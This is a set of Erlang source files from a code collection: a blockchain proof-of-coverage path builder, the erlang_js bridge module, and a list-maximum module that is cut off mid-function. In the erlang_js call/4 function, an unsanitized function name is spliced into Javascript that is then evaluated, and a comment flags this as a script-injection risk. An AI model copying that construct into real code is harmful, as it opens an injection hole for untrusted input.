%% @doc Recursive path builder: keeps extending the (reversed) path with the
%% next selected witness until the `poc_path_limit' is reached or no further
%% hop can be found. `Indices' carries the h3 locations already visited.
-spec build_(TargetPubkeyBin :: libp2p_crypto:pubkey_bin(),
             Ledger :: blockchain:ledger(),
             HeadBlockTime :: pos_integer(),
             Vars :: map(),
             RandState :: rand:state(),
             Indices :: [h3:h3_index()],
             Path :: path()) -> path().
build_(TargetPubkeyBin,
       Ledger,
       HeadBlockTime,
       #{poc_path_limit := Limit} = Vars,
       RandState,
       Indices,
       Path) when length(Path) < Limit ->
    %% Try to find a next hop
    case next_hop(TargetPubkeyBin, Ledger, HeadBlockTime, Vars, RandState, Indices) of
        {error, _} ->
            %% No eligible witness: the path (built in reverse) is complete.
            lists:reverse(Path);
        {ok, {WitnessPubkeyBin, NewRandState}} ->
            %% Try the next hop in the new path, continue building forward
            NextHopGw = find(WitnessPubkeyBin, Ledger),
            Index = blockchain_ledger_gateway_v2:location(NextHopGw),
            NewPath = [WitnessPubkeyBin | Path],
            build_(WitnessPubkeyBin,
                   Ledger,
                   HeadBlockTime,
                   Vars,
                   NewRandState,
                   [Index | Indices],
                   NewPath)
    end;
%% Path limit reached: undo the reverse-order accumulation.
build_(_TargetPubkeyBin, _Ledger, _HeadBlockTime, _Vars, _RandState, _Indices, Path) ->
    lists:reverse(Path).
%% @doc Select the next hop from the gateway's witnesses.
%% Filters the witness list, assigns weighted probabilities, and picks one
%% witness via inverse-CDF sampling using the supplied rand state.
-spec next_hop(GatewayBin :: libp2p_crypto:pubkey_bin(),
               Ledger :: blockchain:ledger(),
               HeadBlockTime :: pos_integer(),
               Vars :: map(),
               RandState :: rand:state(),
               Indices :: [h3:h3_index()]) -> {error, no_witness} |
                                              {error, all_witnesses_too_close} |
                                              {error, zero_weight} |
                                              {ok, {libp2p_crypto:pubkey_bin(), rand:state()}}.
next_hop(GatewayBin, Ledger, HeadBlockTime, Vars, RandState, Indices) ->
    %% Get gateway
    Gateway = find(GatewayBin, Ledger),
    case blockchain_ledger_gateway_v2:witnesses(GatewayBin, Gateway, Ledger) of
        W when map_size(W) == 0 ->
            {error, no_witness};
        Witnesses0 ->
            {RandState1, Witnesses} = limit_witnesses(Vars, RandState, Witnesses0),
            %% If this gateway has witnesses, it is implied that its location cannot be undefined
            GatewayLoc = blockchain_ledger_gateway_v2:location(Gateway),
            %% Filter witnesses
            FilteredWitnesses = filter_witnesses(GatewayLoc, Indices, Witnesses, Ledger, Vars),
            case maps:size(FilteredWitnesses) of
                S when S > 0 ->
                    %% Assign probabilities to filtered witnesses
                    %% P(WitnessRSSI) = Probability that the witness has a good (valid) RSSI.
                    PWitnessRSSI = rssi_probs(FilteredWitnesses, Vars),
                    %% P(WitnessTime) = Probability that the witness timestamp is not stale.
                    PWitnessTime = time_probs(HeadBlockTime, FilteredWitnesses, Vars),
                    %% P(WitnessCount) = Probability that the witness is infrequent.
                    PWitnessCount = witness_count_probs(FilteredWitnesses, Vars),
                    %% P(RSSICentrality) = Probability that the witness rssi lies within a good range
                    PWitnessRSSICentrality = witness_rssi_centrality_probs(FilteredWitnesses, Vars),
                    %% P(Witness) = RSSIWeight*P(WitnessRSSI) + TimeWeight*P(WitnessTime) + CountWeight*P(WitnessCount)
                    PWitness = witness_prob(Vars, PWitnessRSSI, PWitnessTime, PWitnessCount, PWitnessRSSICentrality),
                    PWitnessList = lists:keysort(1, maps:to_list(PWitness)),
                    %% Select witness using icdf
                    {RandVal, NewRandState} = rand:uniform_s(RandState1),
                    case blockchain_utils:icdf_select(PWitnessList, RandVal) of
                        {error, _}=E ->
                            E;
                        {ok, SelectedWitnessPubkeybin} ->
                            {ok, {SelectedWitnessPubkeybin, NewRandState}}
                    end;
                _ ->
                    %% Every witness was removed by the filters.
                    {error, all_witnesses_too_close}
            end
    end.
-spec witness_prob(Vars :: map(),
                   PWitnessRSSI :: prob_map(),
                   PWitnessTime :: prob_map(),
                   PWitnessCount :: prob_map(),
                   PWitnessRSSICentrality :: prob_map()) -> prob_map().
%% @doc Combine the individual per-witness probabilities into one weighted
%% score per witness:
%% P(Witness) = RSSIWeight*P(RSSI) + TimeWeight*P(Time) + CountWeight*P(Count)
%%              + RandomnessWeight*1.0 + CentralityWeight*P(Centrality)
witness_prob(Vars, PWitnessRSSI, PWitnessTime, PWitnessCount, PWitnessRSSICentrality) ->
    maps:map(
      fun(WitnessPubkeyBin, PTime) ->
              TimeTerm = ?normalize_float((time_weight(Vars) * PTime), Vars),
              RSSITerm = ?normalize_float(rssi_weight(Vars) * maps:get(WitnessPubkeyBin, PWitnessRSSI), Vars),
              CountTerm = ?normalize_float(count_weight(Vars) * maps:get(WitnessPubkeyBin, PWitnessCount), Vars),
              %% The randomness weight is always multiplied by a probability of
              %% 1.0. Setting every other weight to 0.0 and randomness_wt to 1.0
              %% therefore gives each witness an equal chance of being picked as
              %% the next hop.
              RandomTerm = ?normalize_float((randomness_wt(Vars) * 1.0), Vars),
              CentralityTerm = ?normalize_float((centrality_wt(Vars) * maps:get(WitnessPubkeyBin, PWitnessRSSICentrality)), Vars),
              %% Same left-to-right addition order as before (float stability).
              TimeTerm + RSSITerm + CountTerm + RandomTerm + CentralityTerm
      end, PWitnessTime).
-spec rssi_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
                 Vars :: map()) -> prob_map().
%% @doc Probability that each witness has a good (valid) RSSI, derived from
%% its RSSI histogram. Histogram bucket 28 is treated as the bad-RSSI bucket
%% (same convention as check_witness_bad_rssi/2).
rssi_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
    %% Degenerate single-witness case is scored 1.0/0.0 directly.
    assign_single_witness_prob(Witnesses);
rssi_probs(Witnesses, Vars) ->
    WitnessList = maps:to_list(Witnesses),
    lists:foldl(fun({WitnessPubkeyBin, Witness}, Acc) ->
                        try
                            blockchain_ledger_gateway_v2:witness_hist(Witness)
                        of
                            RSSIs ->
                                SumRSSI = lists:sum(maps:values(RSSIs)),
                                BadRSSI = maps:get(28, RSSIs, 0),
                                case {SumRSSI, BadRSSI} of
                                    {0, _} ->
                                        %% No RSSI but we have it in the witness list,
                                        %% possibly because of next hop poc receipt.
                                        maps:put(WitnessPubkeyBin, prob_no_rssi(Vars), Acc);
                                    {_S, 0} ->
                                        %% No known bad rssi value
                                        maps:put(WitnessPubkeyBin, prob_good_rssi(Vars), Acc);
                                    {S, S} ->
                                        %% All bad RSSI values
                                        maps:put(WitnessPubkeyBin, prob_bad_rssi(Vars), Acc);
                                    {S, B} ->
                                        %% Invert the "bad" probability: 1 - Bad/Total
                                        maps:put(WitnessPubkeyBin, ?normalize_float((1 - ?normalize_float(B/S, Vars)), Vars), Acc)
                                end
                        catch
                            error:no_histogram ->
                                %% Witness without any histogram at all.
                                maps:put(WitnessPubkeyBin, prob_no_rssi(Vars), Acc)
                        end
                end, #{},
                WitnessList).
-spec time_probs(HeadBlockTime :: pos_integer(),
                 Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
                 Vars :: map()) -> prob_map().
%% @doc Probability that each witness's most recent sighting is fresh.
%% Each witness's delta from HeadBlockTime (in nanoseconds) is normalized
%% against the sum of all deltas and inverted, biasing against staler
%% witnesses. HeadBlockTime is expected in milliseconds (converted via
%% nanosecond_time/1).
time_probs(_, Witnesses, _Vars) when map_size(Witnesses) == 1 ->
    %% Degenerate single-witness case is scored 1.0/0.0 directly.
    assign_single_witness_prob(Witnesses);
time_probs(HeadBlockTime, Witnesses, Vars) ->
    Deltas = lists:foldl(fun({WitnessPubkeyBin, Witness}, Acc) ->
                                 case blockchain_ledger_gateway_v2:witness_recent_time(Witness) of
                                     undefined ->
                                         %% Never seen: treat as maximally stale.
                                         maps:put(WitnessPubkeyBin, nanosecond_time(HeadBlockTime), Acc);
                                     T ->
                                         maps:put(WitnessPubkeyBin, (nanosecond_time(HeadBlockTime) - T), Acc)
                                 end
                         end, #{},
                         maps:to_list(Witnesses)),
    DeltaSum = lists:sum(maps:values(Deltas)),
    %% NOTE: Use inverse of the probabilities to bias against staler witnesses, hence the one minus
    maps:map(fun(_WitnessPubkeyBin, Delta) ->
                     case ?normalize_float((1 - ?normalize_float(Delta/DeltaSum, Vars)), Vars) of
                         0.0 ->
                             %% Delta == DeltaSum, i.e. this witness accounts for
                             %% the entire sum; score it 1.0 instead of 0.0.
                             1.0;
                         X ->
                             X
                     end
             end, Deltas).
-spec witness_count_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
                          Vars :: map()) -> prob_map().
%% @doc Probability that each witness is an infrequent witness: a witness's
%% share of all RSSI samples is inverted, biasing toward rarely-seen witnesses.
witness_count_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
    %% Degenerate single-witness case is scored 1.0/0.0 directly.
    assign_single_witness_prob(Witnesses);
witness_count_probs(Witnesses, Vars) ->
    %% Total RSSI sample count per witness.
    TotalRSSIs = maps:map(fun(_WitnessPubkeyBin, Witness) ->
                                  RSSIs = blockchain_ledger_gateway_v2:witness_hist(Witness),
                                  lists:sum(maps:values(RSSIs))
                          end,
                          Witnesses),
    %% Hoisted out of the loop below: previously this grand total was
    %% recomputed for every witness, making the pass O(n^2).
    GrandTotal = lists:sum(maps:values(TotalRSSIs)),
    maps:map(fun(WitnessPubkeyBin, _Witness) ->
                     case maps:get(WitnessPubkeyBin, TotalRSSIs) of
                         0 ->
                             %% No RSSIs at all, default to 1.0
                             1.0;
                         S ->
                             %% Scale against the grand total and invert.
                             ?normalize_float((1 - ?normalize_float(S/GrandTotal, Vars)), Vars)
                     end
             end, Witnesses).
-spec witness_rssi_centrality_probs(Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
                                    Vars :: map()) -> prob_map().
%% @doc Probability that each witness's RSSI values lie within the configured
%% "good" range, computed from the centrality metrics of its histogram.
witness_rssi_centrality_probs(Witnesses, _Vars) when map_size(Witnesses) == 1 ->
    %% Degenerate single-witness case is scored 1.0/0.0 directly.
    assign_single_witness_prob(Witnesses);
witness_rssi_centrality_probs(Witnesses, Vars) ->
    maps:map(fun(_WitnessPubkeyBin, Witness) ->
                     try
                         blockchain_ledger_gateway_v2:witness_hist(Witness)
                     of
                         Hist ->
                             %% The closer these values are to 0.0, the more confident we
                             %% are that this witness has a reasonable looking RSSI, therefore
                             %% we bias _for_ picking that witness
                             {MaxMetric, MeanMetric} = centrality_metrics(Hist, Vars),
                             blockchain_utils:normalize_float((1 - MaxMetric) * (1 - MeanMetric))
                     catch
                         error:no_histogram ->
                             %% No data to judge by: score 0.0 (never picked on
                             %% centrality alone).
                             0.0
                     end
             end,
             Witnesses).
-spec filter_witnesses(GatewayLoc :: h3:h3_index(),
                       Indices :: [h3:h3_index()],
                       Witnesses :: blockchain_ledger_gateway_v2:witnesses(),
                       Ledger :: blockchain:ledger(),
                       Vars :: map()) -> blockchain_ledger_gateway_v2:witnesses().
%% @doc Drop witnesses that are unsuitable as a next hop: stale challengers,
%% gateways lacking the witness capability, witnesses too close to the path
%% already built (same/nearby parent cells), witnesses with bad RSSI data, and
%% witnesses too far from the current gateway.
filter_witnesses(GatewayLoc, Indices, Witnesses, Ledger, Vars) ->
    {ok, Height} = blockchain_ledger_v1:current_height(Ledger),
    ParentRes = parent_res(Vars),
    ExclusionCells = exclusion_cells(Vars),
    %% Compare locations at the coarser parent resolution.
    GatewayParent = h3:parent(GatewayLoc, ParentRes),
    ParentIndices = [h3:parent(Index, ParentRes) || Index <- Indices],
    maps:filter(fun(WitnessPubkeyBin, Witness) ->
                        WitnessGw = find(WitnessPubkeyBin, Ledger),
                        case is_witness_stale(WitnessGw, Height, Vars) of
                            true ->
                                false;
                            false ->
                                WitnessLoc = blockchain_ledger_gateway_v2:location(WitnessGw),
                                WitnessParent = h3:parent(WitnessLoc, ParentRes),
                                %% Check the GW is allowed to witness; if not, skip all the other checks
                                case blockchain_ledger_gateway_v2:is_valid_capability(WitnessGw, ?GW_CAPABILITY_POC_WITNESS, Ledger) of
                                    false -> false;
                                    true ->
                                        %% Dont include any witnesses in any parent cell we've already visited
                                        not(lists:member(WitnessLoc, Indices)) andalso
                                        %% Don't include any witness whose parent is the same as the gateway we're looking at
                                        (GatewayParent /= WitnessParent) andalso
                                        %% Don't include any witness whose parent is too close to any of the indices we've already seen
                                        check_witness_distance(WitnessParent, ParentIndices, ExclusionCells) andalso
                                        %% Don't include any witness who have a bad rssi
                                        check_witness_bad_rssi(Witness, Vars) andalso
                                        %% Don't include any witness who have bad rssi range
                                        check_witness_bad_rssi_centrality(Witness, Vars) andalso
                                        %% Don't include any witness who are too far from the current gateway
                                        check_witness_too_far(WitnessLoc, GatewayLoc, Vars)
                                end
                        end
                end,
                Witnesses).
-spec check_witness_too_far(WitnessLoc :: h3:h3_index(),
                            GatewayLoc :: h3:h3_index(),
                            Vars :: map()) -> boolean().
%% @doc True when the witness is within the configured maximum hop distance
%% (in grid cells) of the current gateway.
check_witness_too_far(WitnessLoc, GatewayLoc, Vars) ->
    MaxHopCells = poc_max_hop_cells(Vars),
    try
        h3:grid_distance(WitnessLoc, GatewayLoc) < MaxHopCells
    catch
        %% Grid distance may badarg because of pentagonal distortion or
        %% non matching resolutions or just being too far.
        %% In either of those cases, we assume that the gateway
        %% is potentially illegitimate to be a target.
        _:_ -> false
    end.
-spec check_witness_distance(WitnessParent :: h3:h3_index(),
                             ParentIndices :: [h3:h3_index()],
                             ExclusionCells :: pos_integer()) -> boolean().
%% @doc True when the witness's parent cell is at least ExclusionCells away
%% from every parent index already on the path.
check_witness_distance(WitnessParent, ParentIndices, ExclusionCells) ->
    lists:all(fun(ParentIndex) ->
                      try
                          h3:grid_distance(WitnessParent, ParentIndex) >= ExclusionCells
                      catch
                          %% Grid distance may badarg because of pentagonal
                          %% distortion, non matching resolutions, or simply
                          %% being too far. Treat any such failure as a
                          %% rejection, matching the original behaviour.
                          _:_ -> false
                      end
              end, ParentIndices).
-spec check_witness_bad_rssi(Witness :: blockchain_ledger_gateway_v2:gateway_witness(),
                             Vars :: map()) -> boolean().
%% @doc Decide whether a witness's RSSI histogram is trustworthy enough to
%% keep. Only active for PoC version 5 and later; earlier versions always
%% include the witness. Histogram bucket 28 is treated as the bad-RSSI bucket.
check_witness_bad_rssi(Witness, Vars) ->
    case poc_version(Vars) of
        V when is_integer(V), V > 4 ->
            try
                blockchain_ledger_gateway_v2:witness_hist(Witness)
            of
                Hist ->
                    case maps:get(28, Hist, 0) of
                        0 ->
                            %% No bad RSSIs found, include
                            true;
                        BadCount when is_integer(V), V > 5 ->
                            %% Activate with PoC v6
                            %% Check that the bad rssi count is less than
                            %% the sum of the other (known good) rssi buckets
                            BadCount < lists:sum(maps:values(maps:without([28], Hist)));
                        BadCount ->
                            %% PoC v5: if the bad RSSI count does not dominate
                            %% the overall RSSIs this witness has, include,
                            %% otherwise exclude
                            BadCount < lists:sum(maps:values(Hist))
                    end
            catch
                error:no_histogram ->
                    %% No histogram found, include
                    true
            end;
        _ ->
            %% PoC v4 and earlier: no RSSI-based filtering.
            true
    end.
-spec check_witness_bad_rssi_centrality(Witness :: blockchain_ledger_gateway_v2:gateway_witness(),
                                        Vars :: map()) -> boolean().
%% @doc Exclude witnesses whose RSSI histogram looks out of range: when either
%% centrality metric (max-bad/max-good or mean-bad/mean-good ratio) reaches
%% 1.0 the witness is dropped. A witness with no histogram at all is also
%% dropped.
check_witness_bad_rssi_centrality(Witness, Vars) ->
    try
        blockchain_ledger_gateway_v2:witness_hist(Witness)
    of
        Hist ->
            case centrality_metrics(Hist, Vars) of
                %% TODO: Check more conditions?
                %% Check whether the ratio of maxbad/maxgood or meanbad/meangood exceeds 1.0
                %% If so, we exclude that witness
                {M1, M2} when M1 >= 1.0 orelse M2 >= 1.0 ->
                    false;
                _ ->
                    true
            end
    catch
        error:no_histogram ->
            false
    end.
-spec is_witness_stale(Gateway :: blockchain_ledger_gateway_v2:gateway(),
                       Height :: pos_integer(),
                       Vars :: map()) -> boolean().
%% @doc True when the gateway has never been PoC-challenged, or its last
%% challenge is at least the configured challenge age (in blocks) old.
is_witness_stale(Gateway, Height, Vars) ->
    case blockchain_ledger_gateway_v2:last_poc_challenge(Gateway) of
        undefined ->
            %% Never challenged: treat as stale (excluded by the caller).
            true;
        LastChallenge ->
            Age = Height - LastChallenge,
            Age >= challenge_age(Vars)
    end.
%% --- Chain variable accessors --------------------------------------------
%% Each accessor reads a required key from the Vars map; a missing chain
%% variable crashes with a {badkey, Key} error.

-spec rssi_weight(Vars :: map()) -> float().
rssi_weight(Vars) ->
    maps:get(poc_v4_prob_rssi_wt, Vars).

-spec time_weight(Vars :: map()) -> float().
time_weight(Vars) ->
    maps:get(poc_v4_prob_time_wt, Vars).

-spec count_weight(Vars :: map()) -> float().
count_weight(Vars) ->
    maps:get(poc_v4_prob_count_wt, Vars).

-spec prob_no_rssi(Vars :: map()) -> float().
prob_no_rssi(Vars) ->
    maps:get(poc_v4_prob_no_rssi, Vars).

-spec prob_good_rssi(Vars :: map()) -> float().
prob_good_rssi(Vars) ->
    maps:get(poc_v4_prob_good_rssi, Vars).

-spec prob_bad_rssi(Vars :: map()) -> float().
prob_bad_rssi(Vars) ->
    maps:get(poc_v4_prob_bad_rssi, Vars).

-spec parent_res(Vars :: map()) -> pos_integer().
parent_res(Vars) ->
    maps:get(poc_v4_parent_res, Vars).

-spec exclusion_cells(Vars :: map()) -> pos_integer().
exclusion_cells(Vars) ->
    maps:get(poc_v4_exclusion_cells, Vars).
-spec nanosecond_time(Time :: integer()) -> integer().
%% @doc Convert a millisecond timestamp to nanoseconds.
nanosecond_time(Millis) ->
    erlang:convert_time_unit(Millis, millisecond, nanosecond).
%% More chain variable accessors; same {badkey, Key} crash semantics as above.

-spec randomness_wt(Vars :: map()) -> float().
randomness_wt(Vars) ->
    maps:get(poc_v4_randomness_wt, Vars).

-spec centrality_wt(Vars :: map()) -> float().
centrality_wt(Vars) ->
    maps:get(poc_centrality_wt, Vars).

-spec poc_version(Vars :: map()) -> pos_integer().
poc_version(Vars) ->
    maps:get(poc_version, Vars).

-spec challenge_age(Vars :: map()) -> pos_integer().
challenge_age(Vars) ->
    maps:get(poc_v4_target_challenge_age, Vars).

%% Inclusive bounds of the "good" RSSI histogram bucket range.
-spec poc_good_bucket_low(Vars :: map()) -> integer().
poc_good_bucket_low(Vars) ->
    maps:get(poc_good_bucket_low, Vars).

-spec poc_good_bucket_high(Vars :: map()) -> integer().
poc_good_bucket_high(Vars) ->
    maps:get(poc_good_bucket_high, Vars).

-spec poc_max_hop_cells(Vars :: map()) -> integer().
poc_max_hop_cells(Vars) ->
    maps:get(poc_max_hop_cells, Vars).
%% ==================================================================
%% Helper Functions
%% ==================================================================
%% we assume that everything that has made it into build has already
%% been asserted, and thus the lookup will never fail. This function
%% in no way exists simply because
%% blockchain_gateway_cache:get is too much to type a bunch
%% of times.
-spec find(libp2p_crypto:pubkey_bin(), blockchain_ledger_v1:ledger()) -> blockchain_ledger_gateway_v2:gateway().
%% @doc Gateway lookup that asserts success: crashes with badmatch if the
%% address is unknown to the cache.
find(Addr, Ledger) ->
    {ok, Gw} = blockchain_gateway_cache:get(Addr, Ledger),
    Gw.
-spec split_hist(Hist :: blockchain_ledger_gateway_v2:histogram(),
                 Vars :: map()) -> {blockchain_ledger_gateway_v2:histogram(),
                                    blockchain_ledger_gateway_v2:histogram()}.
%% @doc Partition the RSSI histogram into "good" buckets (inside the
%% configured [Low, High] range, inclusive) and "bad" buckets (all the rest).
split_hist(Hist, Vars) ->
    GoodBucketLow = poc_good_bucket_low(Vars),
    GoodBucketHigh = poc_good_bucket_high(Vars),
    %% Split the histogram into two buckets. A direct range comparison
    %% replaces lists:member(Bucket, lists:seq(Low, High)), which materialized
    %% the entire range list for every histogram key.
    GoodBucket = maps:filter(fun(Bucket, _) ->
                                     Bucket >= GoodBucketLow andalso Bucket =< GoodBucketHigh
                             end,
                             Hist),
    BadBucket = maps:without(maps:keys(GoodBucket), Hist),
    {GoodBucket, BadBucket}.
%%%-----------------------------------------------------------------------------
%%% @doc Check whether the range of RSSI values lie within acceptable bounds.
%%% Returns {MaxBad/MaxGood, MeanBad/MeanGood}; when either ratio reaches 1.0
%%% the witnessing is considered too close or inconclusive at best.
%%%-----------------------------------------------------------------------------
-spec centrality_metrics(Hist :: blockchain_ledger_gateway_v2:histogram(),
                         Vars :: map()) -> {float(), float()}.
centrality_metrics(Hist, Vars) ->
    {GoodBucket, BadBucket} = split_hist(Hist, Vars),
    GoodBucketValues = maps:values(GoodBucket),
    BadBucketValues = maps:values(BadBucket),
    SG0 = lists:sum(GoodBucketValues),
    SB0 = lists:sum(BadBucketValues),
    case {SG0, SB0} of
        {SG, SB} when SG > 0 andalso SB > 0 ->
            MaxGood = lists:max(GoodBucketValues),
            MaxBad = lists:max(BadBucketValues),
            %% Reuse SG/SB instead of re-summing the value lists.
            MeanGood = blockchain_utils:normalize_float(SG / length(GoodBucketValues)),
            MeanBad = blockchain_utils:normalize_float(SB / length(BadBucketValues)),
            MaxMetric = blockchain_utils:normalize_float(MaxBad / MaxGood),
            MeanMetric = blockchain_utils:normalize_float(MeanBad / MeanGood),
            %% If either of these two become >= 1.0, we are certain that
            %% either the witnessing is too close or inconclusive at best.
            {MaxMetric, MeanMetric};
        {SG, 0} when SG > 0 ->
            %% Nothing in the bad bucket: best possible metrics.
            {0.0, 0.0};
        _ ->
            %% Everything else is considered bad
            {1.0, 1.0}
    end.
-spec is_legit_rssi_dominating(Witness :: blockchain_ledger_gateway_v2:gateway_witness()) -> boolean().
%% @doc True when the witness's good RSSI samples outnumber the bad ones
%% (histogram bucket 28 is the bad-RSSI bucket).
is_legit_rssi_dominating(Witness) ->
    try
        blockchain_ledger_gateway_v2:witness_hist(Witness)
    of
        Hist ->
            %% Default bucket 28 to 0 when absent. Without the default,
            %% maps:get/2 raises {badkey, 28}, which the no_histogram clause
            %% below does not catch; the rest of this module consistently
            %% reads the bucket as maps:get(28, Hist, 0).
            lists:sum(maps:values(maps:without([28], Hist))) > maps:get(28, Hist, 0)
    catch
        error:no_histogram ->
            false
    end.
-spec assign_single_witness_prob(Witnesses :: blockchain_ledger_gateway_v2:witnesses()) -> prob_map().
%% @doc Probability assignment for the degenerate single-witness case:
%% 1.0 when the witness's legit RSSI samples dominate the bad ones, 0.0
%% otherwise. (The map is expected to hold exactly one entry; see callers.)
assign_single_witness_prob(Witnesses) ->
    maps:map(fun(_WitnessPubkeyBin, Witness) ->
                     case is_legit_rssi_dominating(Witness) of
                         true ->
                             %% There is only a single witness with dominating legit RSSIs
                             1.0;
                         false ->
                             %% All bad RSSIs for this single witness
                             0.0
                     end
             end,
             Witnesses).
%% @doc Optionally cap the number of witnesses considered for the next hop.
%% When the ?poc_witness_consideration_limit chain var is present, pick a
%% deterministic (rand-state driven) subset of at most Limit witnesses;
%% otherwise pass the witness map through untouched.
limit_witnesses(#{?poc_witness_consideration_limit := Limit}, RandState, Witnesses0) ->
    Witnesses = maps:to_list(Witnesses0),
    {RandState1, SubSet} = blockchain_utils:deterministic_subset(Limit, RandState, Witnesses),
    {RandState1, maps:from_list(SubSet)};
limit_witnesses(_Vars, RandState, Witnesses) ->
    {RandState, Witnesses}. | src/poc/blockchain_poc_path_v4.erl | 0.564579 | 0.578567 | blockchain_poc_path_v4.erl | starcoder
%% @author <NAME> <<EMAIL>>
%% @copyright 2009-2010 Basho Technologies
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% @doc Convenience module for interacting with Javascript from Erlang.
%% The functions provided by this module marshal bindings and function
%% args into JSON before sending them to Javascript. While this does
%% incur a certain amount of overhead it has the benefit of (mostly)
%% preserving types as they roundtrip between Erlang and Javascript.
%% Of course, this also means all Erlang values MUST BE convertable
%% into JSON. In practice, this is less restricting than it sounds.
-module(js).
-export([define/2, define/3, eval/2, call/3, call/4]).
%% @spec define(port(), binary()) -> ok | {error, any()}
%% @doc Define one or more Javascript expressions.
define(Ctx, Js) ->
    define(Ctx, Js, []).

%% @spec define(port(), binary(), list(any())) -> ok | {error, any()}
%% @doc Define one or more Javascript expressions using a set of bindings. Bindings
%% are useful when the expressions use closures.
define(Ctx, Js, Bindings) ->
    %% Bindings are rendered as a "Name=JSON;" statement prefix.
    JsBindings = list_to_binary(build_bindings(Bindings, [])),
    FinalJs = iolist_to_binary([JsBindings, Js]),
    js_driver:define_js(Ctx, FinalJs).

%% @spec eval(port(), binary()) -> {ok, any()} | {error, any()}
%% @doc Evaluate one or more Javascript expressions and return the results
eval(Ctx, Js) ->
    js_driver:eval_js(Ctx, Js).

%% @spec call(port(), binary(), list(any())) -> {ok, Result} | {error, any()}
%% @doc Call a function by name with a list of arguments. This is roughly the
%% same as apply in most other languages.
call(Ctx, FunctionName, Args) ->
    call(Ctx, FunctionName, Args, []).

%% @spec call(port(), binary(), list(any()), list(any())) -> {ok, Result} | {error, any()}
%% @doc Call a function by name with a list of arguments and environmental bindings. Bindings
%% behave just like define/3.
call(Ctx, FunctionName, Args, Bindings) ->
    JsBindings = list_to_binary(build_bindings(Bindings, [])),
    ArgList = build_arg_list(Args, []),
    %% The escaped name is only used inside the generated error message; the
    %% raw FunctionName is interpolated straight into the Javascript source.
    %% NOTE(review): FunctionName is not sanitized before interpolation, so
    %% callers must not pass untrusted input here (script injection risk).
    EscapedFunctionName = binary:replace(FunctionName, <<"\"">>, <<"\\\"">>, [global]),
    Js = iolist_to_binary([<<"function() {">>, JsBindings, <<" if (">>, FunctionName, <<" === undefined) { throw(\"">>,
                           EscapedFunctionName, <<" not defined\"); } ">>,
                           <<"return ">>, FunctionName, <<"(">>, ArgList, <<");">>, <<"}();">>]),
    js_driver:eval_js(Ctx, Js).
%% Internal functions
%% Render each {VarName, Value} pair as a "Name=JSON;" assignment statement.
%% Atom names are converted to character lists; the accumulated iolist comes
%% back in reverse order of the input, exactly as before.
build_bindings([], Rendered) ->
    Rendered;
build_bindings([{VarName, Value} | Rest], Rendered) when is_atom(VarName) ->
    Statement = [atom_to_list(VarName), "=", js_mochijson2:encode(Value), ";"],
    build_bindings(Rest, [Statement | Rendered]);
build_bindings([{VarName, Value} | Rest], Rendered) ->
    Statement = [VarName, "=", js_mochijson2:encode(Value), ";"],
    build_bindings(Rest, [Statement | Rendered]).
%% Encode each argument to JSON and join them with commas (no trailing comma).
build_arg_list([], Accum) ->
    lists:reverse(Accum);
build_arg_list([H|[]], Accum) ->
    %% Last argument: no comma separator.
    build_arg_list([], [js_mochijson2:encode(H)|Accum]);
build_arg_list([H|T], Accum) ->
    build_arg_list(T, [[js_mochijson2:encode(H), ","]|Accum]). | deps/erlang_js/src/js.erl | 0.591723 | 0.450843 | js.erl | starcoder
-module(max).
-export([maximum/1, maxdc/1, maxdc2/1, maxdc_tail/1, maxdc_tail2/1]).
-include_lib("eunit/include/eunit.hrl").
-include("./include/testcase.01.hrl").
-import(split2, [split/1]).
%%% Providing 5 different implementations
%% Simple tail-recursive implementation (the fastest of the variants).
maximum([]) ->
    'List is empty';
maximum([First | Rest]) ->
    maximum(Rest, First).

%% Fold the remaining elements into the running maximum.
maximum(Rest, Best) ->
    lists:foldl(fun erlang:max/2, Best, Rest).
%% Implement divide and conquer algorithm: split once, then scan each half;
%% does not scale for very big lists ~ 10^5 elements.
maxdc([]) ->
    'List is empty';
maxdc([X]) ->
    %% A single-element list previously crashed with badmatch, because
    %% lists:split(0, [X]) leaves the first half empty and the two-cons
    %% pattern below cannot match it.
    X;
maxdc(L) ->
    {[HFh | TFh], [HSh | TSh]} = lists:split(length(L) div 2, L),
    %% Each half's maximum is a simple left fold over erlang:max/2.
    max(lists:foldl(fun erlang:max/2, HFh, TFh),
        lists:foldl(fun erlang:max/2, HSh, TSh)).
%% Implement divide and conquer algorithm in tail recursion.
maxdc_tail([]) ->
    'List is empty';
maxdc_tail([H | T]) ->
    %% Seed the accumulator with the first element instead of 0: the 0 seed
    %% returned 0 (wrong) for lists containing only negative numbers.
    maxdc_tail(T, H).

%% Best is the largest element seen so far.
maxdc_tail([], Best) ->
    Best;
maxdc_tail(L, Best) ->
    {L1, L2} = lists:split(length(L) div 2, L),
    case {L1, L2} of
        {[], []} ->
            Best;
        {[], [H2 | T2]} ->
            maxdc_tail(T2, max(Best, H2));
        {[H1 | T1], []} ->
            maxdc_tail(T1, max(Best, H1));
        {[HFh | TFh], [HSh | TSh]} ->
            %% Recurse into both halves; both start from the current Best.
            max(maxdc_tail(TFh, max(Best, HFh)), maxdc_tail(TSh, max(Best, HSh)))
    end.
%% Implement divide and conquer algorithm in tail recursion with 2 accumulators.
maxdc_tail2([]) ->
    'List is empty';
maxdc_tail2([H | T]) ->
    %% Seed both accumulators with the first element instead of 0: the 0 seed
    %% returned 0 (wrong) for lists containing only negative numbers.
    maxdc_tail2(T, H, H).

maxdc_tail2([], M1, M2) ->
    max(M1, M2);
maxdc_tail2(L, M1, M2) ->
    %% split2:split/1 partitions the list into two halves.
    {L1, L2} = split2:split(L),
    case {L1, L2} of
        {[], []} ->
            maxdc_tail2([], M1, M2);
        {[], [H2 | T2]} ->
            maxdc_tail2([], M1, maxdc_tail2(T2, M1, max(M2, H2)));
        {[H1 | T1], []} ->
            maxdc_tail2(T1, max(M1, H1), M2);
        {[HFh | TFh], [HSh | TSh]} ->
